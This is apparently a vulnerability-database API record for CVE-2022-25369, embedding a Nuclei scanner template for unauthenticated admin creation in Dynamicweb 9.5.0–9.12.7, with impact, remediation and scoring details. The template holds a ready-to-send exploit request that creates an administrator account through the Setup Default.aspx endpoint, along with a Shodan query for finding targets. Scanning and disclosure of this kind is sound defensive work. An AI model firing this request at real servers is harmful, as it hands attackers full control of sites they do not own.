{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2022-25369/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2022-25369/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2022-25369/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2022-25369/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2022-25369/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2022-25369"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2022-25369"
    }
  },
  "data": {
    "nuclei": true,
    "nuclei_template": "http/cves/2022/CVE-2022-25369.yaml",
    "nuclei_template_severity": "critical",
    "nuclei_template_yaml": "id: CVE-2022-25369\n\ninfo:\n  name: Dynamicweb 9.5.0 - 9.12.7 Unauthenticated Admin User Creation\n  author: pdteam\n  severity: critical\n  description: Dynamicweb contains a vulnerability which allows an unauthenticated attacker to create a new administrative user.\n  impact: |\n    Unauthenticated attackers can create administrative user accounts through the unprotected Default.aspx endpoint, gaining complete control over the Dynamicweb CMS, its content, and potentially the underlying system.\n  remediation: |\n    Upgrade to one of the fixed versions or higher: Dynamicweb 9.5.9, 9.6.16, 9.7.8, 9.8.11, 9.9, 9.10.18, 9.12.8, or 9.13.0.\n  reference:\n    - https://blog.assetnote.io/2022/02/20/logicflaw-dynamicweb-rce/\n    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-25369\n  classification:\n    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2022-25369\n    epss-score: 0.40014\n    epss-percentile: 0.98568\n    cwe-id: CWE-425\n  metadata:\n    max-request: 1\n    shodan-query: http.component:\"Dynamicweb\"\n  tags: cve2022,cve,dynamicweb,rce,unauth,vkev,vuln\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/Admin/Access/Setup/Default.aspx?Action=createadministrator&adminusername={{rand_base(6)}}&adminpassword={{rand_base(6)}}&adminemail=test@test.com&adminname=test\"\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - '\"Success\": true'\n          - '\"Success\":true'\n        condition: or\n\n      - type: word\n        part: header\n        words:\n          - 'application/json'\n          - 'ASP.NET_SessionId'\n        condition: and\n        case-insensitive: true\n\n      - type: status\n        status:\n          - 200\n# digest: 4b0a00483046022100d12303070244314a98809bacdcde0aac26d1a633e591e3ab400bcfbec754c863022100be255d9d3dd84fe348c5880df07e6a5c703e3cfaec1b8434640e1c11250ed7ab:922c64590222798bb761d5b6d8e72950"
  },
  "source": "nuclei",
  "vuln_id": "cve-2022-25369"
}